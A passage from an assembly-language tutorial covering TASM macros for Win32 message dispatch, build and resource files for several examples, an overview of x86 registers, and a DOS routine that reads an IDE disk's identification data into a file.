WndMessages WndVector, WM_CREATE, WM_SIZE, WM_PAINT, WM_CLOSE, WM_DESTROY

@@WM_CREATE:
; handle the WM_CREATE message here
@@WM_SIZE:
; handle the WM_SIZE message here
@@WM_PAINT:
; handle the WM_PAINT message here
@@WM_CLOSE:
; handle the WM_CLOSE message here
@@WM_DESTROY:
; handle the WM_DESTROY message here

endp WndProc
The handling of each message can be finished in one of three ways:

return TRUE, by jumping to the label @@ret_true;
return FALSE, by jumping to the label @@ret_false;
fall back to default processing, by jumping to the label @@default.
Note that all of these labels are defined in the WndMessages macro, and you should not define them again in the body of the procedure.

Now let's work out what happens when the WndMessages macro is invoked. First, the macro's own parameter counter is reset to zero (the number of these parameters can be arbitrary). Then, in the data segment, a label is created with the name passed to the macro as its first parameter. The label name is formed by concatenating the characters @@ with the vector name, which is achieved with the & operator. For example, if the name TestLabel is passed, the label becomes @@TestLabel. Immediately after the label is declared, another macro, MessageVector, is invoked and receives all the remaining parameters, which must be nothing other than the list of messages to be handled in the window procedure. The structure of the MessageVector macro is simple and straightforward. It takes the first parameter and stores the message code in a dword memory cell. The next dword cell receives the address of the handler label, whose name is formed by the rule described above. The message counter is incremented by one. Then comes a recursive call passing the messages not yet registered, and this continues until the message list is exhausted.

Now, back in the WndMessages macro, the dispatching itself can begin. At this point the essence of the dispatch code should be clear without further explanation.

Message handling in Windows is not linear; as a rule it forms a hierarchy. For example, the WM_COMMAND message can itself carry a multitude of messages coming from the menu and/or other controls. Consequently, this technique can be successfully applied at other levels of the cascade as well, and can even be simplified there. Indeed, we cannot change the codes of the messages arriving at a window or dialog procedure, but the choice of the sequence of constants assigned to menu items or controls is up to us. In that case there is no need for the extra field that stores the message code. Each vector element then contains only the handler address, and finding the right element is very simple: subtract the identifier of the first menu item or first control from the constant received in the message, and that is the index of the required vector element. All that remains is to jump to the handler.
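A minimal sketch of that simplified dispatch in the same Ideal-mode style (the vector @@CmdVector is hypothetical and holds only handler addresses, one per consecutive menu identifier starting at ID_OPEN):

mov eax,[@@wPar]
sub eax,ID_OPEN                            ; index relative to the first menu identifier
jb  @@default                              ; below the first ID: not one of ours
cmp eax,ID_EXIT - ID_OPEN
ja  @@default                              ; above the last ID: not one of ours
jmp [dword eax * 4 + offset @@CmdVector]   ; each element is the address of a handler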

In general, the topic of macro definitions is very instructive and broad. I rarely see macros used competently, which is a pity, because with their help working in assembler can be made much simpler and more pleasant.

Summary
Not much is needed to write full-fledged applications for Win32:

the compiler and linker themselves (I use the TASM32 and TLINK32 pair from the TASM 5.0 package); before using it, I recommend applying the patch for this package, available from http://www.borland.com/ or from our ftp server ftp.uralmet.ru;
a resource editor and resource compiler (I use Developer Studio and brcc32.exe);
a re-translation of the header files describing the Win32 API procedures, structures and constants from the C notation into the notation of the chosen assembler mode, Ideal or MASM.
As a result you will be able to write light and elegant Win32 applications, with which you can create visual forms, work with databases, handle communications, and work with multimedia tools. Just as when writing programs for DOS, you retain the ability to use the processor's resources to the fullest, while the complexity of writing applications is considerably reduced thanks to the richer operating system services, a more convenient addressing scheme, and the very simple structure of the programs.

Appendix 1. Files needed for the first example
The resource constants file resource.inc

IDD_DIALOG = 65 ; 101
IDR_NAME = 3E8 ; 1000
IDC_STATIC = -1
The module definition file dlg.def

NAME TEST
DESCRIPTION 'Demo dialog'
EXETYPE WINDOWS
EXPORTS DlgProc @1
The build file, makefile

# Make file for Demo dialog
# make -B
# make -B -DDEBUG for debug information

NAME = dlg
OBJS = $(NAME).obj
DEF = $(NAME).def
RES = $(NAME).res

TASMOPT=/m3 /mx /z /q /DWINVER=0400 /D_WIN32_WINNT=0400

!if $d(DEBUG)
TASMDEBUG=/zi
LINKDEBUG=/v
!else
TASMDEBUG=/l
LINKDEBUG=
!endif

!if $d(MAKEDIR)
IMPORT=$(MAKEDIR)\..\lib\import32
!else
IMPORT=import32
!endif

$(NAME).EXE: $(OBJS) $(DEF) $(RES)
tlink32 /Tpe /aa /c $(LINKDEBUG) $(OBJS),$(NAME),, $(IMPORT), $(DEF), $(RES)

.asm.obj:
tasm32 $(TASMDEBUG) $(TASMOPT) $&.asm

$(RES): $(NAME).RC
BRCC32 -32 $(NAME).RC
The header file resource.h

//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by dlg.rc
//
#define IDD_DIALOG 101
#define IDR_NAME 1000
#define IDC_STATIC -1

// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 102
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
Appendix 2. Files needed for the second example
The module definition file mylib.def

LIBRARY MYLIB
DESCRIPTION 'DLL EXAMPLE, 1997'
EXPORTS Hex2Str @1
The build file, makefile

# Make file for Demo DLL
# make -B
# make -B -DDEBUG for debug information

NAME = mylib
OBJS = $(NAME).obj
DEF = $(NAME).def
RES = $(NAME).res

TASMOPT=/m3 /mx /z /q /DWINVER=0400 /D_WIN32_WINNT=0400

!if $d(DEBUG)
TASMDEBUG=/zi
LINKDEBUG=/v
!else
TASMDEBUG=/l
LINKDEBUG=
!endif

!if $d(MAKEDIR)
IMPORT=$(MAKEDIR)\..\lib\import32
!else
IMPORT=import32
!endif

$(NAME).EXE: $(OBJS) $(DEF)
tlink32 /Tpd /aa /c $(LINKDEBUG) $(OBJS),$(NAME),, $(IMPORT), $(DEF)

.asm.obj:
tasm32 $(TASMDEBUG) $(TASMOPT) $&.asm

$(RES): $(NAME).RC
BRCC32 -32 $(NAME).RC
Appendix 3. Files needed for the third example
The module definition file dmenu.def

NAME TEST
DESCRIPTION 'Demo menu'
EXETYPE WINDOWS
EXPORTS WndProc @1
The resource file dmenu.rc

#include "resource.h"
MyMenu MENU DISCARDABLE
BEGIN
POPUP "Files"
BEGIN
MENUITEM "Open", ID_OPEN
MENUITEM "Save", ID_SAVE
MENUITEM SEPARATOR
MENUITEM "Exit", ID_EXIT
END
MENUITEM "Other", 65535
END
The header file resource.h

//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by dmenu.rc
//
#define MyMenu 101
#define ID_OPEN 40001
#define ID_SAVE 40002
#define ID_EXIT 40003
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 102
#define _APS_NEXT_COMMAND_VALUE 40004
#define _APS_NEXT_CONTROL_VALUE 1000
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
The build file, makefile

# Make file for Turbo Assembler Demo menu
# make -B
# make -B -DDEBUG -DVERN for debug information and version
NAME = dmenu
OBJS = $(NAME).obj
DEF = $(NAME).def
RES = $(NAME).res
!if $d(DEBUG)
TASMDEBUG=/zi
LINKDEBUG=/v
!else
TASMDEBUG=/l
LINKDEBUG=
!endif

!if $d(VER2)
TASMVER=/dVER2
!elseif $d(VER3)
TASMVER=/dVER3
!else
TASMVER=/dVER1
!endif

!if $d(MAKEDIR)
IMPORT=$(MAKEDIR)\..\lib\import32
!else
IMPORT=import32
!endif

$(NAME).EXE: $(OBJS) $(DEF) $(RES)
tlink32 /Tpe /aa /c $(LINKDEBUG) $(OBJS),$(NAME),, $(IMPORT), $(DEF), $(RES)

.asm.obj:
tasm32 $(TASMDEBUG) $(TASMVER) /m /mx /z /zd $&.asm

$(RES): $(NAME).RC
BRCC32 -32 $(NAME).RC

About registers in assembler

A register is a small storage area inside the processor itself, from 8 to 32 bits long, used for intermediate storage of the data being processed. Some registers hold only specific kinds of information.
The general-purpose registers are EAX, EBX, ECX, EDX. They are 32 bits wide and are each divided into two parts; the lower parts, AX, BX, CX, DX, are 16 bits wide and are in turn divided into two 8-bit registers. Thus AX is divided into AH and AL, DX into DH and DL, and so on. The letter "H" denotes the high part.

So AH and AL are one byte each, AX is 2 bytes (a word), and EAX is 4 bytes (a dword, or double word). These registers are used for operations on data, such as comparisons, arithmetic, or writing data to memory.
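A tiny sketch of how the same bits are visible through the narrower registers:

mov eax, 12345678h   ; EAX = 12345678h, so AX = 5678h, AH = 56h, AL = 78h
mov al, 0FFh         ; EAX = 123456FFh, only the lowest byte has changed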

The CX register is most often used as a loop counter.

In DOS programs, AH selects which service will be invoked by an INT call.
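For example, the classic DOS call that prints a '$'-terminated string (a minimal sketch; message is a hypothetical string defined elsewhere and ending with '$'):

mov ah, 09h            ; DOS service 09h: print the string at DS:DX
mov dx, offset message
int 21h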

The segment registers are CS, DS, ES, FS, GS, SS. These registers are 16 bits wide and hold the segment part of a "segment:offset" address.

CS is the code segment (memory page) of the program currently being executed.
DS is the data segment (page) of the running program, i.e., constants, string references and so on.
SS is the stack segment of the running program.
ES, FS, GS are additional segments and may be left unused by a program.
The offset registers are EIP, ESP, EBP, ESI, EDI. These registers are 32 bits wide, and their lower halves are accessible as the registers IP, SP, BP, SI, DI.

EIP is the instruction pointer: it holds the offset (the displacement relative to the start of the program) of the line of code to be executed next. The full address of the next line of code to be executed is therefore CS:EIP.
The ESP register points to the top of the stack (the address where the next value will be placed by a PUSH instruction).
The EBP register holds the address from which data is pushed onto or taken from the stack (the "depth" of the stack). Function parameters have a positive offset relative to EBP, local variables a negative one, and the full address of this memory area is SS:EBP.
The ESI register is the source address: it holds the address of the start of a block of data for a "move block" operation (full address DS:ESI), and the EDI register is the destination address in that operation (full address ES:EDI).
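A minimal sketch of such a block move (srcBuf and dstBuf are hypothetical buffers of at least 100h bytes):

cld                      ; make sure the copy runs forward
mov esi, offset srcBuf   ; DS:ESI, the source
mov edi, offset dstBuf   ; ES:EDI, the destination
mov ecx, 100h            ; number of bytes to copy
rep movsb                ; copy the block byte by byte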
The control registers are CR0, CR1, CR2, CR3. These 32-bit registers set the processor's operating mode (normal, protected, and so on), page-based memory mapping, and the like. They are accessible only to programs running in the innermost protection ring (the kernel, for example). You should not touch them.

The debug registers are DR0, DR1, DR2, DR3, DR4, DR5, DR6, DR7. The first four hold breakpoint addresses; the rest specify what should happen when a breakpoint is reached.

The test registers are TR6 and TR7. They are used by the operating system to test the page-based memory mapping. You only need them if you intend to write your own OS.

How do you find out the serial number and type of an IDE hard disk?

.Model Tiny
.Code
Base_Port equ 1f0h              ; base I/O port of the primary IDE channel
HD equ 0                        ; Hard Disk number (0 = master, 1 = slave)
.Startup
mov dx, Base_Port + 6           ; drive/head register
mov al, 10100000b or (HD shl 4) ; select the drive
out dx, al
jmp $ + 2                       ; short I/O delay
inc dx                          ; command register (Base_Port + 7)
mov al, 0ech                    ; IDENTIFY DEVICE command
out dx, al
jmp $ + 2
@@Wait: in al, dx               ; read the status register
jmp $ + 2
test al, 80h                    ; BSY bit
jnz @@Wait                      ; wait until the drive is no longer busy
mov dx, Base_Port               ; data register
lea di, Buffer
mov cx, 100h                    ; 256 words = 512 bytes of identification data
@@1: in ax, dx
xchg ah, al                     ; the ID strings come byte-swapped, swap them back
stosw
loop @@1
xor cx, cx                      ; normal file attributes
lea dx, Fname
mov ah, 3ch                     ; DOS: create file
int 21h
xchg bx, ax                     ; file handle into BX
lea dx, Buffer
mov cx, 100h                    ; number of bytes to write
mov ah, 40h                     ; DOS: write to file
int 21h
mov ah, 3eh                     ; DOS: close file
int 21h
ret

Fname db 'hdd_id.dat', 0
Buffer dw 100h dup (?)          ; room for the 256 words received from the drive

end